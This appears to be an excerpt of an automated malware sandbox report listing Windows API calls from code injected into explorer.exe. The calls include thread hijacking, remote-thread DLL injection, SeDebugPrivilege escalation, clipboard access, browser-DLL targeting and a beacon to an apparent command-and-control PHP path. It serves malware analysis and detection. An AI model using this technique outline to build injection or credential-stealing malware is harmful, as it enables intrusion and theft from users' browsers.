                                                                                                                                                                                                                          • SuspendThread.KERNEL32 ref: 0E8B8AFF
                                                                                                                                                                                                                            • Part of subcall function 0E8B8EA0: GetThreadContext.KERNEL32 ref: 0E8B8ED4
                                                                                                                                                                                                                            • Part of subcall function 0E8B8EA0: SetThreadContext.KERNEL32 ref: 0E8B8F94
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B8B16
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4205413918-0
                                                                                                                                                                                                                          • Opcode ID: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
                                                                                                                                                                                                                          • Instruction ID: 5beb50301e503653f6574b6b2fc5d0ad59d265eb9ac8d2185d67559c0a1673fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21016D32215B84C7D718DF16E49065EB7A4F789F80F589429DB9A97B14CF38D862CB04
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B8860: Sleep.KERNEL32 ref: 0E8B888C
                                                                                                                                                                                                                          • HeapCreate.KERNEL32 ref: 0E8B8DCD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeapSleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 221814145-0
                                                                                                                                                                                                                          • Opcode ID: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
                                                                                                                                                                                                                          • Instruction ID: 206aff9efa9cde6f9d89a43bd98a9c19316e5b7ef578bec563b8a671b55eb1e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73E0925171270083EF6DBBB958923A91088DF48310F4C5C38CE0CC6781DE2D4CEB57A6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                          • String ID: @$B8IH
                                                                                                                                                                                                                          • API String ID: 596952117-2566893802
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                                                                          • String ID: @$B8IH$LoadLibraryA$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 752146563-1695730724
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 08B70C78
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _FF_MSGBANNER.LIBCMT ref: 08B8CB3C
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _NMSG_WRITE.LIBCMT ref: 08B8CB46
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _callnewh.LIBCMT ref: 08B8CB7A
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB85
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB90
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71020
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71028
                                                                                                                                                                                                                            • Part of subcall function 08B8CACC: _errno.LIBCMT ref: 08B8CAEC
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71030
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B71039
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                          • String ID: GetFileVersionInfoSizeA$Process32Next$StrChrA$VerQueryValueA$_errno$eCriticalSection$ersionInfoA$isdigit$isxdigit$olhelp32Snapshot
                                                                                                                                                                                                                          • API String ID: 2761444284-1026861232
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0E8B32C6
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32 ref: 0E8B32D9
                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32 ref: 0E8B32FD
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0E8B3320
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B332B
                                                                                                                                                                                                                          • OpenProcess.KERNEL32 ref: 0E8B333B
                                                                                                                                                                                                                            • Part of subcall function 0E8B3070: OpenProcess.KERNEL32 ref: 0E8B3099
                                                                                                                                                                                                                            • Part of subcall function 0E8B3070: CloseHandle.KERNEL32 ref: 0E8B30C1
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B3378
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: B8IH$SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2357999848-533093496
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1677084743-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1006321803-0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 812771569-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4124047334-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1433255627-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8BEF20: GetWindowsDirectoryA.KERNEL32 ref: 0E8BEF6C
                                                                                                                                                                                                                            • Part of subcall function 0E8BEF20: GetVolumeInformationA.KERNEL32 ref: 0E8BEFB6
                                                                                                                                                                                                                            • Part of subcall function 0E8BEF20: wsprintfA.USER32 ref: 0E8BF017
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                          • lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: send.WS2_32 ref: 0E8B74EC
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: recv.WS2_32 ref: 0E8B7553
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcmpiA.KERNEL32 ref: 0E8B75B3
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrlenA.KERNEL32 ref: 0E8B75D7
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: StrStrA.SHLWAPI ref: 0E8B75EF
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcmpiA.KERNEL32 ref: 0E8B760E
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: strtol.MSVCRT ref: 0E8B7626
                                                                                                                                                                                                                          • lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcpyA.KERNEL32 ref: 0E8B731E
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B732F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7343
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7357
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7368
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B737C
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B739A
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: wsprintfA.USER32 ref: 0E8B73B2
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73C6
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7416
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: WSAStartup.WS2_32 ref: 0E8B7426
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: socket.WS2_32 ref: 0E8B7442
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: gethostbyname.WS2_32 ref: 0E8B7459
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: memcpy.MSVCRT ref: 0E8B7479
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: htons.WS2_32 ref: 0E8B7488
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: connect.WS2_32 ref: 0E8B749F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrlenA.KERNEL32 ref: 0E8B74B5
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: send.WS2_32 ref: 0E8B74CB
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                          • lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                          • String ID: /VzCAHn.php?616766F8886C145454191$616766F8886C145454191$B8IH
                                                                                                                                                                                                                          • API String ID: 3667244998-664803577
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8CA1C0: RtlInitializeCriticalSection.NTDLL ref: 0E8CA1F1
                                                                                                                                                                                                                            • Part of subcall function 0E8CA1C0: RtlInitializeCriticalSection.NTDLL ref: 0E8CA1FE
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 0E8C9960
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 0E8C997A
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 0E8C999F
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8C99FA
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C9A03
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                          • String ID: .text$B8IH$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                          • API String ID: 308684148-1405465699
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4099253644-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                                          • String ID: ESA$ESE
                                                                                                                                                                                                                          • API String ID: 2027218043-2868331210
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _malloc_crt.LIBCMT ref: 0E8D2F89
                                                                                                                                                                                                                            • Part of subcall function 0E8D01E8: malloc.LIBCMT ref: 0E8D0213
                                                                                                                                                                                                                            • Part of subcall function 0E8D01E8: Sleep.KERNEL32 ref: 0E8D0226
                                                                                                                                                                                                                          • free.LIBCMT ref: 0E8D308A
                                                                                                                                                                                                                          • free.LIBCMT ref: 0E8D30A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 2523592665-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B4A00: isdigit.MSVCRT ref: 0E8B4A27
                                                                                                                                                                                                                          • tolower.MSVCRT ref: 0E8B48B8
                                                                                                                                                                                                                            • Part of subcall function 0E8B46A0: malloc.MSVCRT ref: 0E8B46B0
                                                                                                                                                                                                                            • Part of subcall function 0E8B46A0: free.MSVCRT ref: 0E8B46D0
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0E8B4939
                                                                                                                                                                                                                          • _errno.MSVCRT ref: 0E8B493F
                                                                                                                                                                                                                          • strtod.MSVCRT ref: 0E8B495D
                                                                                                                                                                                                                          • _errno.MSVCRT ref: 0E8B49BA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3554981057-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2288870239-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 0E8D4482
                                                                                                                                                                                                                          • RaiseException.KERNEL32 ref: 0E8D44AB
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 0E8D450C
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8D445F
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _getptd_noexit.LIBCMT ref: 0E8D23B2
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _amsg_exit.LIBCMT ref: 0E8D23C2
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8D4511
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8D451D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8CD565
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8CD55A
                                                                                                                                                                                                                            • Part of subcall function 0E8CF4B0: _getptd_noexit.LIBCMT ref: 0E8CF4B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E8CD5AD
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8CD5BC
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8CD5C7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B8C965
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B8C95A
                                                                                                                                                                                                                            • Part of subcall function 08B8E8B0: _getptd_noexit.LIBCMT ref: 08B8E8B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08B8C9AD
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B8C9BC
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B8C9C7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2370468470-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3301496367-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8DB9CB
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8DB9C0
                                                                                                                                                                                                                            • Part of subcall function 0E8CF4B0: _getptd_noexit.LIBCMT ref: 0E8CF4B4
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8DBA6E
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8DBA79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1573762532-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B9ADCB
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B9ADC0
                                                                                                                                                                                                                            • Part of subcall function 08B8E8B0: _getptd_noexit.LIBCMT ref: 08B8E8B4
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B9AE6E
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B9AE79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
